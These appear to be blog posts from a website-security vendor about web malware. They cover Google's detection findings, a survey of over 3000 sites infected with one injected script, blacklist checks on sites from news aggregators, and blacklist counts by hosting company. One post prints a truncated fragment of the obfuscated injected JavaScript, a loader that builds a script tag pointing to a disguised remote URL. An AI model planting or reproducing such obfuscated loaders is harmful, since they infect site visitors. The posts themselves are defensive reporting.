Google announced today that the fight to detect web-based malware is far from over. The problem is growing and changing every day. Websites must be protected to prevent the spread of web-based malware.

From the Article

Google issued a new study on Wednesday detailing how it is becoming more difficult to identify malicious websites and attacks, with antivirus software proving to be an ineffective defense against new ones.

Read More: Google highlights trouble in detecting Web-based malware

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Security blacklist, blacklisted websites, google, malicious websites, malware, safebrowsing, Security

Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

Till next time.
Read more…

Report, Security blacklisted websites, code injection, infected sites, malicious websites

News aggregation sites, like Digg.com, Reddit.com, Ycombinator and Yahoo Buzz play an important part in the lives of many web-surfers. It is reported that sites like Digg.com have garnered more visitors than heavyweights like Facebook [1].

I was recently asked: “What is the probability of  a site listed on popular news aggregation sites to be blacklisted?” The answer to this question is not a very simple one. We understand that benign websites are often compromised by malicious code, sometimes due to application layer vulnerabilities or server side vulnerabilities or a combination of both. Good websites can even be compromised by simple password disclosure, or worse, a blatant nonchalant attitude towards security.

My instinct tells me that any site listed on these well known news aggregation sites, if infected, will be spotted rather quickly by some visitor to the “infected” website. If the webmaster is even half interested in the reputation of their site, they will take prompt action to remove the offending code as the number of visitors providing feedback would continue to grow. Thereby, even if a site listed on a news aggregation site were to be compromised I think it would be fixed up rather quickly.

In short I think the probability of finding an “infected” site listed on these news aggregation websites would be pretty low. To prove this, at StopTheHacker.com we conducted a small test. We analyzed around 1162 unique websites which were pointed to by one of the four news aggregation websites below:

• Digg.com
• Reddit.com
• Ycombinator
• Yahoo Buzz

We found that none of the analyzed 1162 sites were listed on Google’s Safe Browsing malware hash list as of January 19, 2010. This might be an indication of the fact that good content, interesting to the masses, is hosted on sites conscious about their security and the safety of their visitors. Given the state of Internet security today, this is one of few heartening trends.
Read more…

News, Report blacklisted websites, news aggregation sites

Some of the largest web hosting companies in the United States and abroad host more than 500,000 websites individually. These web-hosting companies focus on providing a cost-effective solution for clients to develop and maintain their Internet-facing websites. To protect these websites, these web-hosting companies often use Web-Application-Filters (WAFs) and more traditional firewall-type devices along with password protected (S)FTP access.

Anyone delving into Web-Application Security issues would realize that simply throwing up a bunch of WAFs to deal with code-injection attacks is not the greatest solution. Code injection attacks are constantly evolving because they provide hackers with a great medium with which to deliver malicious code to unsuspecting Internet surfers. It is not because of the lack of effort on part of WAF developers that code injection attacks are not being nipped in the bud, instead it is because this attack vector presents such an attractive medium for hackers to further their nefarious intentions, with comparatively less effort than other more involved hacking techniques.

Bottom line, code injection attacks and signatures are constantly changing. WAFs used by many hosting companies cannot guarantee full protection against them.

Two big reasons it is difficult to protect websites:

1. You can only protect against what you know about
2. WAFs are not self-learning and self-tuning

At StopTheHacker.com, our approach is to develop systems based on Artificial Intelligence techniques which can learn from attacks and adapt using machine learning to block and identify previously unknown code-injection incidents.

In this article we try to identify how many sites from each of the top few web-hosting companies are currently blacklisted. This gives us an indication of the kind of security being employed and the effectiveness of the systems.

This test was conducted on January 19, 2010. The AS data was mined from CAIDA and was correlated with Google Safe Browsing data.

Number of sites blacklisted by hosting company:

Hosting Company Name           ASN  Sites Blacklisted

IX WebHosting                32392               4160
GoDaddy                      26496              12648
DreamHost                    26347               5636
GigeNet                      32181                647
Peer 1                       11388               2332
Lunar Pages                  15244               3754
iWeb                         32613               2161
ThePlanet/HostGator          21844              11347
Bluehost/Hostmonster         11798               6232
LiquidWeb                    32244               3113
Leaseweb                     16265               2393
Schlund (1&1)                 8560               9105
Tele2 Telecommunication GmbH  8437               8229
China Telecom                 4812               4919
Inetwork/iEurop              29629               3197
NetworkSolutions              6245                739
RackSpace                    33070                698

Clearly, whatever security mechanism are being employed by these hosting companies, they are not enough to stop hordes of their websites falling prey to code-injection attacks and other forms of malicious attacks. Perhaps owners of these large numbers of compromised websites will force web-hosting companies to take a more proactive approach to safe hosting for their clients.

Interestingly, a web-hosting company which focuses on a secure hosting experience maps to ASN 7819, which seems to host 26 malicious sites.

EDIT: On Jan 20 2010, 7:05 AM PST, we received feedback from the webhosting company which focuses on a secure webhosting experience, that the IP ranges mentioned (below)  in this article are not used by them to host websites, but are simply the ones that belong to the datacenter they employ.  We will be very interested in re-evaluating IP ranges that are used by them to present websites on the Internet.

Read more…

News, Report, Security blacklisted websites, Security, web-hosting companies